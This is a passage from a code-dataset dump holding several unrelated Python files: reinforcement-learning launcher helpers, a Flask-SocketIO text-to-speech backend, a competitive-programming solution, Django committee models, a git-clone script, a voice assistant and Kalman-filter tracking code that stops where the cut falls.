**kwargs).from_buffer(data)\n","repo_name":"binref/refinery","sub_path":"refinery/lib/magic.py","file_name":"magic.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":505,"dataset":"github-code","pt":"34"} +{"seq_id":"27934077096","text":"from rllab.misc.instrument import stub\nimport tensorflow as tf\n\nfrom sandbox.rocky.tf.algos.trpo import TRPO\nfrom sandbox.rocky.tf.algos.ddpg import DDPG\nfrom sandbox.rocky.tf.algos.vpg import VPG\n\nfrom rllab.baselines.linear_feature_baseline import LinearFeatureBaseline\nfrom sandbox.rocky.tf.baselines.q_baseline import QfunctionBaseline\n\nfrom rllab.envs.gym_env import GymEnv\nfrom rllab.envs.normalized_env import normalize\nfrom sandbox.rocky.tf.envs.base import TfEnv\n\nfrom sandbox.rocky.tf.exploration_strategies.ou_strategy import OUStrategy\n\nfrom sandbox.rocky.tf.policies.gaussian_mlp_policy import GaussianMLPPolicy\nfrom sandbox.rocky.tf.policies.deterministic_mlp_policy import DeterministicMLPPolicy\n\nfrom sandbox.rocky.tf.q_functions.continuous_mlp_q_function import ContinuousMLPQFunction\n\ndef get_env(env_name, record_video=True, record_log=True, normalize_obs=False, **kwargs):\n env = TfEnv(normalize(GymEnv(env_name, record_video=record_video,\n record_log=record_log), normalize_obs=normalize_obs))\n return env\n\ndef get_policy(env, algo_name, **kwargs):\n policy = None\n if algo_name in ['trpo', 'qprop', 'vpg', 'qvpg']:\n policy = GaussianMLPPolicy(\n name=\"policy\",\n env_spec=env.spec,\n # hidden_sizes=(hid_size, hid_size)\n hidden_sizes=(100, 50, 25),\n hidden_nonlinearity=tf.nn.tanh,\n )\n elif algo_name in ['ddpg']:\n policy = DeterministicMLPPolicy(\n name=\"policy\",\n env_spec=env.spec,\n #hidden_sizes=(hid_size, hid_size),\n hidden_sizes=(100, 50, 25),\n #hidden_sizes=(100,100),\n hidden_nonlinearity=tf.nn.relu,\n )\n return policy\n\ndef get_qf(env, algo_name, qf_hid_size, qf_hidden_nonlinearity, **kwargs):\n qf = None\n if algo_name in ['ddpg', 'qprop', 'qvpg']:\n if qf_hidden_nonlinearity == 'relu':\n hidden_nonlinearity = tf.nn.relu\n elif qf_hidden_nonlinearity == 'tanh':\n hidden_nonlinearity = tf.nn.tanh\n else: raise NotImplementedError(qf_hidden_nonlinearity)\n qf = ContinuousMLPQFunction(\n env_spec=env.spec,\n 
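# the Q-network width and activation are taken from the qf_hid_size / qf_hidden_nonlinearity launcher arguments above\n            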
#hidden_sizes=(100,100),\n hidden_sizes=(qf_hid_size, qf_hid_size),\n hidden_nonlinearity=hidden_nonlinearity,\n )\n return qf\n\ndef get_es(env, algo_name, **kwargs):\n es = None\n if algo_name in ['ddpg']:\n es = OUStrategy(env_spec=env.spec)\n return es\n\ndef get_baseline(env, algo_name, **kwargs):\n baseline = None\n if algo_name in ['trpo', 'qprop', 'vpg', 'qvpg']:\n baseline = LinearFeatureBaseline(env_spec=env.spec)\n return baseline\n\ndef get_algo(env, policy, es, qf, baseline, max_path_length,\n batch_size, replay_pool_size, discount,\n scale_reward, learning_rate, replacement_prob,\n policy_updates_ratio,\n step_size, gae_lambda,\n sample_backups,\n qprop_min_itr,\n qf_updates_ratio,\n qprop_use_qf_baseline,\n qprop_eta_option,\n algo_name,\n qf_learning_rate,\n n_itr,\n **kwargs):\n algo = None\n min_pool_size = 1000\n qf_batch_size = 64\n qf_baseline = None\n\n print('Creating algo=%s with n_itr=%d, max_path_length=%d...'%(\n algo_name, n_itr, max_path_length))\n\n if algo_name in ['ddpg']:\n algo = DDPG(\n env=env,\n policy=policy,\n es=es,\n qf=qf,\n batch_size=qf_batch_size,\n max_path_length=max_path_length,\n epoch_length=batch_size, # make comparable to batchopt methods\n min_pool_size=min_pool_size,\n replay_pool_size=replay_pool_size,\n n_epochs=n_itr,\n discount=discount,\n scale_reward=scale_reward,\n qf_learning_rate=qf_learning_rate,\n policy_learning_rate=learning_rate,\n replacement_prob=replacement_prob,\n policy_updates_ratio=policy_updates_ratio,\n # Uncomment both lines (this and the plot parameter below) to enable plotting\n # plot=True,\n )\n elif algo_name in ['trpo', 'qprop']:\n if qf is not None:\n qf_baseline = QfunctionBaseline(env_spec=env.spec,\n policy=policy, qf=qf)\n algo = TRPO(\n env=env,\n policy=policy,\n baseline=baseline,\n batch_size=batch_size,\n max_path_length=max_path_length,\n n_itr=n_itr,\n discount=discount,\n step_size=step_size,\n gae_lambda=gae_lambda,\n # Uncomment both lines (this and the plot parameter below) to enable plotting\n # plot=True,\n sample_backups=sample_backups,\n qf=qf,\n qf_batch_size=qf_batch_size,\n min_pool_size=min_pool_size,\n scale_reward=scale_reward,\n qprop_min_itr=qprop_min_itr,\n qf_updates_ratio=qf_updates_ratio,\n qprop_eta_option=qprop_eta_option,\n replay_pool_size=replay_pool_size,\n replacement_prob=replacement_prob,\n qf_baseline=qf_baseline,\n qf_learning_rate=qf_learning_rate,\n qprop_use_qf_baseline=qprop_use_qf_baseline,\n )\n elif algo_name in ['vpg', 'qvpg']:\n if qf is not None:\n qf_baseline = QfunctionBaseline(env_spec=env.spec,\n policy=policy, qf=qf)\n algo = VPG(\n env=env,\n policy=policy,\n baseline=baseline,\n batch_size=batch_size,\n max_path_length=max_path_length,\n n_itr=n_itr,\n discount=discount,\n gae_lambda=gae_lambda,\n optimizer_args=dict(\n tf_optimizer_args=dict(\n learning_rate=learning_rate,\n )\n ),\n qf=qf,\n qf_batch_size=qf_batch_size,\n min_pool_size=min_pool_size,\n scale_reward=scale_reward,\n qprop_min_itr=qprop_min_itr,\n qf_updates_ratio=qf_updates_ratio,\n qprop_eta_option=qprop_eta_option,\n replay_pool_size=replay_pool_size,\n qf_baseline=qf_baseline,\n qf_learning_rate=qf_learning_rate,\n qprop_use_qf_baseline=qprop_use_qf_baseline,\n )\n return algo\n\nstub(globals())\n","repo_name":"StevenLOL/rllabplusplus","sub_path":"sandbox/rocky/tf/launchers/launcher_stub_utils.py","file_name":"launcher_stub_utils.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} 
+{"seq_id":"72821442656","text":"async_mode = None\n\nif async_mode is None:\n try:\n import eventlet\n async_mode = 'eventlet'\n except ImportError:\n pass\n\n if async_mode is None:\n try:\n from gevent import monkey\n async_mode = 'gevent'\n except ImportError:\n pass\n\n if async_mode is None:\n async_mode = 'threading'\n\n print('async_mode is ' + async_mode)\n\nif async_mode == 'eventlet':\n import eventlet\n eventlet.monkey_patch()\nelif async_mode == 'gevent':\n from gevent import monkey\n monkey.patch_all()\n\nfrom threading import Thread\nfrom flask import Flask, json\nfrom flask import request, Response\nfrom flask_cors import CORS\nfrom flask_socketio import SocketIO, emit\nfrom dbconn import db_conn, db_aggregation\nfrom inference import Inference\nfrom backend_helpers import helper, log\nfrom backend_helpers.s3_storage import S3Storage\n\nimport time\n\n\n\nCHUNK = 4096\nPORT = 8888\nS3BUCKET = \"https://audiomodelstts.s3.eu-central-1.amazonaws.com/\"\n\ninference = Inference()\ninference.load_model()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'development key'\nsocketio = SocketIO(app, async_mode=async_mode)\ncors = CORS(app, resources={r\"/\": {\"origins\": \"\"}})\nCORS(app)\n\nthread = None\nconn = None\ncursor = None\n\nlogger = log.setup_custom_logger('root')\n\n\nclass AggData(object):\n def __init__(self, filename, audio_length, job_text_id):\n self.filename = filename\n self.audio_length = audio_length\n self.job_text_id = job_text_id\n self.audio_length_percent = 0\n\n\n@socketio.on('send_message')\ndef getdata(send_message):\n start = time.time()\n try:\n tmp_val = json.loads(send_message['body'])\n data = tmp_val['message']\n user = tmp_val['user']\n except Exception as e:\n logger.error(\"Wrong input - return null\", e)\n return \"\"\n\n record = db_conn.perform_query(user)\n\n if record == None:\n return None\n\n s3_client = S3Storage()\n\n headline = (data[:70] + '..') if len(data) > 70 else data\n job_id = db_conn.perform_insert_jobs(record['uid'], 0, 1, headline)\n\n count = 0\n sentence_list = helper.split_sentences(data)\n agg_list = []\n\n for sentence in sentence_list:\n job_text_id = job_id + '_' + str(count)\n audio_length = inference.infer(sentence, job_text_id)\n filename = \"tmp/\" + job_text_id + \".mp3\"\n agg_list.append(AggData(filename, audio_length, job_text_id))\n\n s3_filename = job_text_id + \".mp3\"\n db_conn.perform_insert_job_text(job_id, sentence, audio_length, count)\n count += 1\n\n response = s3_client.store_data(\"audiomodelstts\", filename, s3_filename)\n print(sentence)\n data = {\n 'id': str(time.time()),\n 'downloadURL': S3BUCKET+s3_filename,\n 'sentence': sentence,\n 'duration': str(audio_length),\n 'audio_id': count,\n 'job_id': S3BUCKET+s3_filename\n }\n\n emit('player', {'data': data}, broadcast=False, include_self=True)\n\n\n #start background thread - merge files - write to db - propagate changes to frontend\n audio_length_total = db_aggregation.aggregate_job_results(agg_list, job_id, s3_client)\n data = {\n 'user': user,\n 'uid': record['uid']\n }\n\n status = gettable(data)\n end = time.time()\n print(\"Produced audio length: \" + str(audio_length_total) + \" Processing time: \" + str(end - start))\n\n\n@socketio.on('get_table')\ndef gettable(get_table=None):\n db_results = []\n user = \"\"\n uid = \"\"\n record = None\n tmp_val = None\n try:\n user = get_table['user']\n uid = get_table['uid']\n except Exception as e:\n logger.error(\"Wrong input - return null\", e)\n return False\n\n try:\n if uid == \"\":\n 
record = db_conn.perform_query(user)\n db_results = db_conn.perform_query_jobs(record['uid'])\n else:\n db_results = db_conn.perform_query_jobs(uid)\n except Exception as e:\n logger.error(\"No result for table\", e)\n return False\n\n emit('table', {'data': db_results}, broadcast=False, include_self=True)\n return True\n\n\n@socketio.on('delete_table')\ndef delete_entry(delete_table=None):\n\n uid = \"\"\n\n try:\n uid = delete_table['uid']\n except Exception as e:\n logger.error(\"Wrong input - return null\", e)\n return \"\"\n\n try:\n record = db_conn.perform_delete_jobs(uid)\n except Exception as e:\n logger.error(\"No result for table\", e)\n return \"\"\n\n #emit('table', {'data': db_results}, broadcast=False, include_self=True)\n\n\ndef background_thread():\n \"\"\"Example of how to send server generated events to clients.\"\"\"\n count = 0\n while True:\n time.sleep(10)\n count += 1\n socketio.emit('my response',\n {'data': 'Server generated event', 'count': count},\n namespace='/test')\n\n\n@socketio.on('connect')\ndef connected():\n print(\"connecting\")\n print(request.sid)\n data = {'request_id': request.sid,\n 'timestamp': int(time.time())}\n json_data = json.dumps(data)\n emit('echo', {'data': json_data}, broadcast=False, include_self=True)\n\n\n@socketio.on('disconnect')\ndef disconnect():\n print(\"disconnecting\")\n data = {'request_id': request.sid,\n 'timestamp': int(time.time())}\n json_data = json.dumps(data)\n emit('echo', {'data': json_data}, broadcast=False, include_self=True)\n\n\n@app.route('/')\ndef index():\n Response.headers.add('Access-Control-Allow-Origin', '*')\n global thread\n if thread is None:\n thread = Thread(target=background_thread)\n thread.daemon = True\n thread.start()\n return \"\"\n\n\nif __name__ == \"__main__\":\n from gevent import monkey\n monkey.patch_all()\n socketio.run(app, debug=True, port=8888, host=\"0.0.0.0\")\n","repo_name":"jaystary/tacotron2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"83067992","text":"'''\n******* 문제 푼 후 느낀 것 *********\n'''\n\n'''\n2022/10/07\nboj.kr/20920\n영단어 암기는 괴로워\n'''\nimport sys\ninput = sys.stdin.readline\n\nN, M = map(int,input().split())\n\n# (횟수, 길이, 첫문자)\nword_dict = dict()\n\nfor _ in range(N):\n word = input().strip()\n word_len = len(word)\n \n if word_len < M :\n continue\n\n if word not in word_dict:\n word_dict[word] = (-1, -word_len, word) \n else :\n a, b, c = word_dict[word]\n word_dict[word] = (a-1, b, c)\n\nfor key in sorted(word_dict.items(), key=lambda x: (x[1][0], x[1][1], x[1][2])):\n print(key[0])","repo_name":"P3RP/daily-algorithm-test","sub_path":"kty/baekjoon/20920.py","file_name":"20920.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"73750245856","text":"# encoding: utf-8\nimport re\nimport logging\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.text import truncate_words\nfrom django.contrib.contenttypes import generic\n\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.contenttypes.models import ContentType\nfrom tagging.models import Tag\nfrom annotatetext.models import Annotation\nfrom knesset.events.models import Event\n\nCOMMITTEE_PROTOCOL_PAGINATE_BY = 400\n\nlogger = logging.getLogger(\"open-knesset.committees.models\")\n\nclass 
Committee(models.Model):\n    name = models.CharField(max_length=256)\n    members = models.ManyToManyField('mks.Member', related_name='committees')\n    chairpersons = models.ManyToManyField('mks.Member', related_name='chaired_committees')\n    replacements = models.ManyToManyField('mks.Member', related_name='replacing_in_committees')\n    events = generic.GenericRelation(Event, content_type_field=\"which_type\",\n                                     object_id_field=\"which_pk\")\n\n    def __unicode__(self):\n        return \"%s\" % self.name\n\n    @models.permalink\n    def get_absolute_url(self):\n        return ('committee-detail', [str(self.id)])\n\n    @property\n    def annotations(self):\n        protocol_part_tn = ProtocolPart._meta.db_table\n        meeting_tn = CommitteeMeeting._meta.db_table\n        committee_tn = Committee._meta.db_table\n        annotation_tn = Annotation._meta.db_table\n        protocol_part_ct = ContentType.objects.get_for_model(ProtocolPart)\n        ret = Annotation.objects.filter(content_type=protocol_part_ct)\n        return ret.extra(tables = [protocol_part_tn,\n                    meeting_tn, committee_tn],\n                 where = [ \"%s.object_id=%s.id\" % (annotation_tn, protocol_part_tn),\n                          \"%s.meeting_id=%s.id\" % (protocol_part_tn, meeting_tn),\n                          \"%s.committee_id=%%s\" % meeting_tn],\n                 params = [ self.id ]).distinct()\n\n    def members_by_presence(self):\n        members = []\n        for m in (self.members.all()|\n                  self.chairpersons.all()|\n                  self.replacements.all()).distinct():\n            m.meetings_count = \\\n                100 * m.committee_meetings.filter(committee=self).count() \\\n                / self.meetings.count()\n            members.append(m)\n        members.sort(key=lambda x:x.meetings_count, reverse=True)\n        return members\n\n    def recent_meetings(self):\n        return self.meetings.all().order_by('-date')[:10]\n\nnot_header = re.compile(r'(^אני )|((אלה|אלו|יבוא|מאלה|ייאמר|אומר|אומרת|נאמר|כך|הבאים|הבאות):$)|(\\(.\\))|(\\(\\d+\\))|(\\d\\.)'.decode('utf8'))\ndef legitimate_header(line):\n    \"\"\"Returns True if 'line' looks like something that should be a protocol part header\"\"\"\n    if not(line.endswith(':')) or len(line)>50 or not_header.search(line):\n        return False\n    return True\n\nclass CommitteeMeeting(models.Model):\n    committee = models.ForeignKey(Committee, related_name='meetings')\n    # TODO: do we really need a date string? 
can't we just format date?\n date_string = models.CharField(max_length=256)\n date = models.DateField()\n mks_attended = models.ManyToManyField('mks.Member', related_name='committee_meetings')\n votes_mentioned = models.ManyToManyField('laws.Vote', related_name='committee_meetings', blank=True)\n protocol_text = models.TextField(null=True,blank=True)\n topics = models.TextField(null=True,blank=True)\n src_url = models.URLField(verify_exists=False, max_length=1024,null=True,blank=True)\n\n class Meta:\n ordering = ('-date',)\n verbose_name = _('Committee Meeting')\n verbose_name_plural = _('Committee Meetings')\n\n def title (self):\n return truncate_words (self.topics, 12)\n\n def __unicode__(self):\n return (u\"%s - %s\" % (self.committee.name,\n self.title())).replace(\" \", u\"\\u00A0\")\n\n @models.permalink\n def get_absolute_url(self):\n return ('committee-meeting', [str(self.id)])\n\n def _get_tags(self):\n tags = Tag.objects.get_for_object(self)\n return tags\n\n def _set_tags(self, tag_list):\n Tag.objects.update_tags(self, tag_list)\n\n tags = property(_get_tags, _set_tags)\n\n def save(self, **kwargs):\n super(CommitteeMeeting, self).save(**kwargs)\n\n def create_protocol_parts(self, delete_existing=False):\n \"\"\" Create protocol parts from this instance's protocol_text\n Optionally, delete existing parts.\n If the meeting already has parts, and you don't ask to\n delete them, a ValidationError will be thrown, because\n it doesn't make sense to create the parts again.\n \"\"\"\n if delete_existing:\n ppct = ContentType.objects.get_for_model(ProtocolPart)\n annotations = Annotation.objects.filter(content_type=ppct, object_id__in=self.parts.all)\n logger.debug('deleting %d annotations, because I was asked to delete the relevant protocol parts on cm.id=%d' % (annotations.count(), self.id))\n annotations.delete()\n self.parts.all().delete()\n else:\n if self.parts.count():\n raise ValidationError('CommitteeMeeting already has parts. 
delete them if you want to run create_protocol_parts again.')\n\n if not self.protocol_text: # sometimes there are empty protocols\n return # then we don't need to do anything here.\n\n # break the protocol to its parts\n # first, fix places where the colon is in the begining of next line\n # (move it to the end of the correct line)\n protocol_text = []\n for line in re.sub(\"[ ]+\",\" \", self.protocol_text).split('\\n'):\n if line.startswith(':'):\n protocol_text[-1] += ':'\n protocol_text.append(line[1:])\n else:\n protocol_text.append(line)\n\n i = 1\n section = []\n header = ''\n\n # now create the sections\n for line in protocol_text:\n if legitimate_header(line):\n if section:\n ProtocolPart(meeting=self, order=i,\n header=header, body='\\n'.join(section)).save()\n i += 1\n header = line[:-1]\n section = []\n else:\n section.append (line)\n\n # don't forget the last section\n ProtocolPart(meeting=self, order=i,\n header=header, body='\\n'.join(section)).save()\n\nclass ProtocolPartManager(models.Manager):\n def list(self):\n return self.order_by(\"order\")\n\nclass ProtocolPart(models.Model):\n meeting = models.ForeignKey(CommitteeMeeting, related_name='parts')\n order = models.IntegerField()\n header = models.TextField(blank=True)\n body = models.TextField(blank=True)\n speaker = models.ForeignKey('persons.Person', blank=True, null=True, related_name='protocol_parts')\n objects = ProtocolPartManager()\n\n annotatable = True\n\n def get_absolute_url(self):\n if self.order == 1:\n return self.meeting.get_absolute_url()\n else:\n page_num = 1 + (self.order-1)/COMMITTEE_PROTOCOL_PAGINATE_BY\n if page_num==1: # this is on first page\n return \"%s#speech-%d-%d\" % (self.meeting.get_absolute_url(),\n self.meeting.id, self.order)\n else:\n return \"%s?page=%d#speech-%d-%d\" % (self.meeting.get_absolute_url(),\n page_num,\n self.meeting.id, self.order)\n\n def __unicode__(self):\n return \"%s %s: %s\" % (self.meeting.committee.name, self.header,\n self.header)\n\n\nfrom listeners import *\n","repo_name":"daonb/django-committee","sub_path":"src/committee/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7866,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25475064707","text":"from common import *\nfrom joblib import Parallel, delayed\nimport yaml, os, pathlib\n\ndef success(path, name, out):\n for l in out: filter_output(l)\n print(\"Done cloning repo {} into {}\".format(name, path))\n\ndef failure(path):\n print(colored(\"Failed to clone {}\".format(path), 'red'))\n\ndef git_clone(name, path):\n print(\"Cloning {} into {}\".format(name, path))\n out, err, ret = git(['clone', name, path], path)\n\n if ret == 0:\n success(path, name, out)\n else:\n failure(path)\n\ndef create_symlinks(links):\n for s,link in links.items():\n src = str(pathlib.Path(s).resolve())\n\n if os.path.exists(link): # Link already exists\n continue\n elif not os.path.exists(src): # Targer doesn't exist\n print('Skipping link {} to {} as {} doesnt exists'.format(link, src, src))\n continue\n\n pathlib.Path(link).parent.mkdir(parents=True, exist_ok=True)\n print('Creating symlink {} to {}'.format(link, src))\n os.symlink(src, link)\n\ndef recursive_walk(d, depth=0, parent=[]):\n for k, v in sorted(d.items(), key=lambda x: x[0]):\n if isinstance(v, dict):\n recursive_walk(v, depth+1, parent + [k])\n continue\n\n path = \"/\".join(parent + [k])\n if os.path.exists(path):\n continue\n\n if v.startswith('git@') or v.startswith('https://'):\n 
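# remote git URLs get cloned; any other value is treated as a local path to symlink\n            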
git_repos[v] = path\n        else:\n            sym_links[v] = path\n\ndef main():\n    with open('_repos.yml', 'r') as f:\n        repos = yaml.load(f)\n\n    recursive_walk(repos)\n    Parallel(n_jobs=get_cpu_count())(delayed(git_clone)(r,p) for r,p in git_repos.items())\n    create_symlinks(sym_links)\n\ngit_repos = {}\nsym_links = {}\nmain()\n","repo_name":"dnktty/batch-git-clone","sub_path":"clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28042158522","text":"#you can change ALEXA to any name you want, all you have to do is change 'alexa' to your desired name \r\n#since always typing speech_recognition takes a lot of time we use [as sr] you can change sr to anything you wish\r\nimport speech_recognition as sr\r\n#pyttsx3 is a library in python that is used to convert text to speech\r\nimport pyttsx3\r\n#pywhatkit is a library in python that is used for many automation tasks, mainly whatsapp and youtube; in the below code we use the youtube feature \r\nimport pywhatkit\r\nimport datetime\r\n#wikipedia is a library we use to search information, this has a package to give a summary \r\nimport wikipedia\r\nimport pyjokes\r\n\r\nlistener = sr.Recognizer()\r\nengine = pyttsx3.init()\r\n#there are two options for the voice, 0 for male and 1 for female\r\nvoices = engine.getProperty('voices')\r\nengine.setProperty('voice', voices[1].id)\r\n\r\ndef talk(text):\r\n    engine.say(text)\r\n    engine.runAndWait()\r\n    \r\ndef take_command():\r\n    command = \"\"  # default so a failed recognition cannot leave 'command' unbound below\r\n    try:\r\n        with sr.Microphone() as source:\r\n            print(\"listening....\")\r\n            voice = listener.listen(source)\r\n            command = listener.recognize_google(voice)\r\n            command = command.lower()\r\n            if 'alexa' in command:\r\n                command = command.replace('alexa','')\r\n            # engine.say(command)\r\n            # engine.runAndWait()\r\n            # print(command)\r\n            \r\n    #you need except here because sometimes your microphone might not work or your voice is not recognised , if you want to relate this is like try and catch block in java \r\n    except:\r\n        pass\r\n    return command\r\n\r\ndef run_alexa():\r\n    command = take_command()\r\n    print(command)\r\n    if 'play' in command:\r\n        song = command.replace('play', '')\r\n        talk('playing' + song)\r\n        pywhatkit.playonyt(song)\r\n        \r\n    elif 'time' in command:\r\n        time = datetime.datetime.now().strftime('%I %M %p')\r\n        print(time)\r\n        talk('Current time is'+ time)\r\n        \r\n    elif 'who is' in command:\r\n        person = command.replace('who is','')\r\n        info = wikipedia.summary(person, 2)\r\n        # print(info)\r\n        talk(info)\r\n        \r\n    elif 'date' in command:\r\n        talk(\"sorry, I don't date losers \")\r\n        \r\n    elif 'i love you' in command: \r\n        talk(\"that is very cute but you are ugly\") \r\n        \r\n    elif 'are you single' in command: \r\n        talk(\"Bro I'm dating your wifi... 
oops\") \r\n \r\n elif 'joke' in command:\r\n funny = pyjokes.get_joke()\r\n print(funny)\r\n talk(funny)\r\n #talk(pyjokes.get_joke())\r\n else:\r\n talk(\"I don't understand\")\r\n \r\n \r\nwhile True: \r\n run_alexa()\r\n","repo_name":"KeerthanaMSwamy/Alexa-clone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"2326092086","text":"import dynamics\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport lidarScan2\nimport boundingbox\nfrom stl import mesh\nfrom estimateOmega import estimate\nfrom associationdata import nearest_search\n\nfrom mpl_toolkits import mplot3d\nfrom matplotlib import pyplot\n\ndef drawrectangle(ax, p1, p2, p3, p4, p5, p6, p7, p8, color):\n # z1 plane boundary\n ax.plot([p1[0], p2[0]], [p1[1], p2[1]], [p1[2], p2[2]], color=color) # W\n ax.plot([p2[0], p3[0]], [p2[1], p3[1]], [p2[2], p3[2]], color=color)\n ax.plot([p3[0], p4[0]], [p3[1], p4[1]], [p3[2], p4[2]], color=color)\n ax.plot([p4[0], p1[0]], [p4[1], p1[1]], [p4[2], p1[2]], color=color)\n\n # z1 plane boundary\n ax.plot([p5[0], p6[0]], [p5[1], p6[1]], [p5[2], p6[2]], color=color) # W\n ax.plot([p6[0], p7[0]], [p6[1], p7[1]], [p6[2], p7[2]], color=color)\n ax.plot([p7[0], p8[0]], [p7[1], p8[1]], [p7[2], p8[2]], color=color)\n ax.plot([p8[0], p5[0]], [p8[1], p5[1]], [p8[2], p5[2]], color=color)\n\n # Connecting\n ax.plot([p1[0], p5[0]], [p1[1], p5[1]], [p1[2], p5[2]], color=color) # W\n ax.plot([p2[0], p6[0]], [p2[1], p6[1]], [p2[2], p6[2]], color=color)\n ax.plot([p3[0], p7[0]], [p3[1], p7[1]], [p3[2], p7[2]], color=color)\n ax.plot([p4[0], p8[0]], [p4[1], p8[1]], [p4[2], p8[2]], color=color)\n\n ax.scatter(p1[0], p1[1], p1[2], color='b')\n ax.scatter(p2[0], p2[1], p2[2], color='g')\n ax.scatter(p3[0], p3[1], p3[2], color='r')\n ax.scatter(p4[0], p4[1], p4[2], color='c')\n ax.scatter(p5[0], p5[1], p5[2], color='m')\n ax.scatter(p6[0], p6[1], p6[2], color='y')\n ax.scatter(p7[0], p7[1], p7[2], color='k')\n ax.scatter(p8[0], p8[1], p8[2], color='b')\n\n# some utility functions\ndef tilde(v):\n vx = v[0,0]\n vy = v[1,0]\n vz = v[2,0]\n v_tilde = np.array([[0,-vz,vy],[vz,0,-vx],[-vy,vx,0]])\n return v_tilde\n\ndef skew(vector):\n vector = list(vector)\n return np.array([[0, -vector[2], vector[1]],\n [vector[2], 0, -vector[0]],\n [-vector[1], vector[0], 0]])\n\ndef getR(x,y,z):\n # we want to find the rotation matrix that takes [x,y,z] to [0,0,1]\n p = np.array([x,y,z]) # position vector, but also z-axis of b frame\n z_L = np.array([0,0,1]) # z-axis of L frame\n z_B = p/np.linalg.norm(p)\n e = (np.cross(z_L, z_B))[:,np.newaxis] # 3x1 axis of rotation\n phi = np.arccos(np.dot(z_B, z_L)) # z_B and z_L are already unit vectors\n R = e@(e.T) + (np.identity(3)-(e@e.T))*np.cos(phi) + tilde(e)*np.sin(phi)\n return R.T\n\n\ndef F_matrix(dt, R, p_k, p1_k, p2_k, p3_k, p4_k, p5_k, p6_k, p7_k, p8_k):\n \"\"\"\n\n :param dt:\n :param R:\n :param p_k:\n :param p1_k:\n :param p2_k:\n :param p3_k:\n :param p4_k:\n :param p5_k:\n :param p6_k:\n :param p7_k:\n :param p8_k:\n :return:\n \"\"\"\n F = np.eye(33)\n\n # p_k - dv/dp_k\n F[0, 3] = dt\n F[1, 4] = dt\n F[2, 5] = dt\n\n # p1_k - dv/dp1_k\n F[9, 3] = dt\n F[10, 4] = dt\n F[11, 5] = dt\n\n # dp1_k/dp1_k\n F[9:12, 9:12] = R\n\n # dp1_k/dp_k\n F[9:12, 0:3] = 1 - R\n\n # dp1_k/domega\n F[9:12, 6:9] = skew(p1_k - p_k)\n\n # p2_k\n F[12, 3] = dt\n F[13, 4] = dt\n F[14, 5] = dt\n F[12:15, 12:15] = R\n 
F[12:15, 0:3] = 1 - R\n F[12:15, 6:9] = skew(p2_k - p_k)\n\n # p3_k\n F[15, 3] = dt\n F[16, 4] = dt\n F[17, 5] = dt\n F[15:18, 15:18] = R\n F[15:18, 0:3] = 1 - R\n F[15:18, 6:9] = skew(p3_k - p_k)\n\n # p4_k\n F[18, 3] = dt\n F[19, 4] = dt\n F[20, 5] = dt\n F[18:21, 18:21] = R\n F[18:21, 0:3] = 1 - R\n F[18:21, 6:9] = skew(p4_k - p_k)\n\n # p5_k\n F[21, 3] = dt\n F[22, 4] = dt\n F[23, 5] = dt\n F[21:24, 21:24] = R\n F[21:24, 0:3] = 1 - R\n F[21:24, 6:9] = skew(p5_k - p_k)\n\n # p6_k\n F[24, 3] = dt\n F[25, 4] = dt\n F[26, 5] = dt\n F[24:27, 24:27] = R\n F[24:27, 0:3] = 1 - R\n F[24:27, 6:9] = skew(p6_k - p_k)\n\n # p7_k\n F[27, 3] = dt\n F[28, 4] = dt\n F[29, 5] = dt\n F[27:30, 27:30] = R\n F[27:30, 0:3] = 1 - R\n F[27:30, 6:9] = skew(p7_k - p_k)\n\n # p8_k\n F[30, 3] = dt\n F[31, 4] = dt\n F[32, 5] = dt\n F[30:33, 30:33] = R\n F[30:33, 0:3] = 1 - R\n F[30:33, 6:9] = skew(p8_k - p_k)\n\n return F\n\ndef verticeupdate(dt, x_k):\n\n # Decompose the state vector\n p_k = x_k[:3]\n v_k = x_k[3:6]\n omega_k = x_k[6:9]\n p1_k = x_k[9:12]\n p2_k = x_k[12:15]\n p3_k = x_k[15:18]\n p4_k = x_k[18:21]\n p5_k = x_k[21:24]\n p6_k = x_k[24:27]\n p7_k = x_k[27:30]\n p8_k = x_k[30:33]\n\n # Rotation matrix - rodrigues formula\n e_omega = omega_k / np.linalg.norm(omega_k) # Unit vector along omega\n phi = np.linalg.norm(omega_k) * dt\n ee_t = np.matmul(e_omega.reshape(len(e_omega), 1), e_omega.reshape(1, len(e_omega)))\n e_tilde = skew(e_omega)\n R_k_kp1 = ee_t + (np.eye(len(e_omega)) - ee_t) * np.cos(phi) + e_tilde * np.sin(phi)\n\n # Translate vertices to origin\n p1_ko = p1_k - p_k\n p2_ko = p2_k - p_k\n p3_ko = p3_k - p_k\n p4_ko = p4_k - p_k\n p5_ko = p5_k - p_k\n p6_ko = p6_k - p_k\n p7_ko = p7_k - p_k\n p8_ko = p8_k - p_k\n\n # Rotate vertices\n p1_kp1o = np.matmul(R_k_kp1.T, p1_ko.reshape(len(p1_ko), 1))\n p2_kp1o = np.matmul(R_k_kp1.T, p2_ko.reshape(len(p2_ko), 1))\n p3_kp1o = np.matmul(R_k_kp1.T, p3_ko.reshape(len(p3_ko), 1))\n p4_kp1o = np.matmul(R_k_kp1.T, p4_ko.reshape(len(p4_ko), 1))\n p5_kp1o = np.matmul(R_k_kp1.T, p5_ko.reshape(len(p5_ko), 1))\n p6_kp1o = np.matmul(R_k_kp1.T, p6_ko.reshape(len(p6_ko), 1))\n p7_kp1o = np.matmul(R_k_kp1.T, p7_ko.reshape(len(p7_ko), 1))\n p8_kp1o = 